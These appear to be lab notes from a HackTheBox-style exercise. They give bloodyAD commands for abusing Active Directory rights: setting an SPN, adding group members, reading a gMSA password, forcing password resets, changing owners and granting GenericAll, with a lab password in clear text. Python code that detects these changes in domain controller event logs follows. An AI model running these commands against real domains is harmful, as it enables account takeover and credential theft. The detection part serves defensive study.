BloodyAD

  • Set an SPN on a user (WriteSPN)

└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u henry -p 'H3nry_987TGV!' set object 'Alfred' servicePrincipalName -v 'anurag/htb'
[+] Alfred's servicePrincipalName has been updated

  • List the objects the current user can write to

bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' get writable --detail

OR

bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' get writable

  • Add a member to a group

└─$ bloodyAD --host $TARGET -d $DOMAIN -u $USER -p $PASS add groupMember Infrastructure 'Alfred'
[+] Alfred added to Infrastructure

  • Read a gMSA managed password

└─$ bloodyAD --host $TARGET -d $DOMAIN -u $USER -p $PASS get object --resolve-sd 'ansible_dev$' --attr msDS-ManagedPassword

  • Reset a user's password (ForceChangePassword)

└─$ bloodyAD --host $TARGET -d $DOMAIN -u $USER -p :$HASH set password sam 'P@ssw0rd@123'

  • Change the owner of an object (here john becomes owned by sam)

└─$ bloodyAD --host $TARGET -d $DOMAIN -u $USER -p $PASS set owner john sam

  • Give a user GenericAll rights over an object (target first, then trustee)

bloodyAD --host $TARGET -d $DOMAIN -u $USER -p $PASS add genericAll John Alfred
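
The write operations listed above are recorded in the domain controller's Security log when account management and directory service change auditing are enabled. The following Python is an added example, not part of the original notes or of bloodyAD: it classifies flattened event records (IDs 4724, 4728/4732/4756 and 5136) and diffs the old and new nTSecurityDescriptor SDDL to spot owner changes and new full-control ACEs. The records, domain, SID and correlation IDs are constructed, and it assumes the "value deleted" 5136 record precedes the "value added" record of the same operation.

```python
import re

FULL_CONTROL = "CCDCLCSWRPWPDTLOCRSDRCWDWO"  # SDDL rights of a full-control (GenericAll) ACE
ADDED, DELETED = "%%14674", "%%14675"        # OperationType codes in event 5136
DN = "CN={},CN=Users,DC=example,DC=test"     # constructed domain
SID = "S-1-5-21-1111-2222-3333-1105"         # constructed SID
SD0, SD1 = "O:DAG:DAD:(A;;RP;;;AU)", f"O:{SID}G:DAD:(A;;RP;;;AU)"  # before / after owner change
SD2 = SD1 + f"(A;;{FULL_CONTROL};;;{SID})"                          # after full-control ACE is added

def ev5136(who, obj, attr, op, value, corr):  # constructed, flattened 5136 record
    return {"EventID": 5136, "SubjectUserName": who, "ObjectDN": DN.format(obj), "ObjectClass": "user",
            "AttributeLDAPDisplayName": attr, "OperationType": op, "AttributeValue": value, "OpCorrelationID": corr}

EVENTS = [  # constructed sample input
    ev5136("henry", "Alfred", "servicePrincipalName", ADDED, "svc/host1", "op-1"),
    {"EventID": 4728, "SubjectUserName": "alfred", "TargetUserName": "Infrastructure"},
    {"EventID": 4724, "SubjectUserName": "ansible_dev$", "TargetUserName": "sam"},
    ev5136("sam", "john", "nTSecurityDescriptor", DELETED, SD0, "op-2"),
    ev5136("sam", "john", "nTSecurityDescriptor", ADDED, SD1, "op-2"),
    ev5136("sam", "john", "nTSecurityDescriptor", DELETED, SD1, "op-3"),
    ev5136("sam", "john", "nTSecurityDescriptor", ADDED, SD2, "op-3"),
]

def sddl_parts(sddl):  # -> (owner, set of ACE strings without parentheses)
    owner = re.match(r"O:(.*?)(?:G:|D:|$)", sddl)
    return (owner.group(1) if owner else None), set(re.findall(r"\(([^)]*)\)", sddl))

def detect(events):
    findings, old_sd = [], {}
    for e in events:
        eid, who = e["EventID"], e["SubjectUserName"]
        if eid in (4728, 4732, 4756):      # member added to a security group
            findings.append(("group_member_added", who, e["TargetUserName"]))
        elif eid == 4724:                  # password reset by another principal
            findings.append(("password_reset", who, e["TargetUserName"]))
        elif eid == 5136 and e["AttributeLDAPDisplayName"] == "servicePrincipalName":
            if e["OperationType"] == ADDED and e["ObjectClass"] == "user":
                findings.append(("spn_added_to_user", who, e["ObjectDN"]))
        elif eid == 5136 and e["AttributeLDAPDisplayName"] == "nTSecurityDescriptor":
            if e["OperationType"] == DELETED:          # old descriptor, keep for the diff
                old_sd[e["OpCorrelationID"]] = e["AttributeValue"]
            elif e["OpCorrelationID"] in old_sd:       # new descriptor of the same operation
                old_owner, old_aces = sddl_parts(old_sd.pop(e["OpCorrelationID"]))
                new_owner, new_aces = sddl_parts(e["AttributeValue"])
                if old_owner != new_owner:
                    findings.append(("owner_changed", who, e["ObjectDN"]))
                if any(a.split(";")[:3:2] == ["A", FULL_CONTROL] for a in new_aces - old_aces):
                    findings.append(("full_control_ace_added", who, e["ObjectDN"]))
    return findings
```

An SPN added to a computer object is ignored on purpose, since services register SPNs on machine accounts routinely; on a user object it is far less common and worth reviewing.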
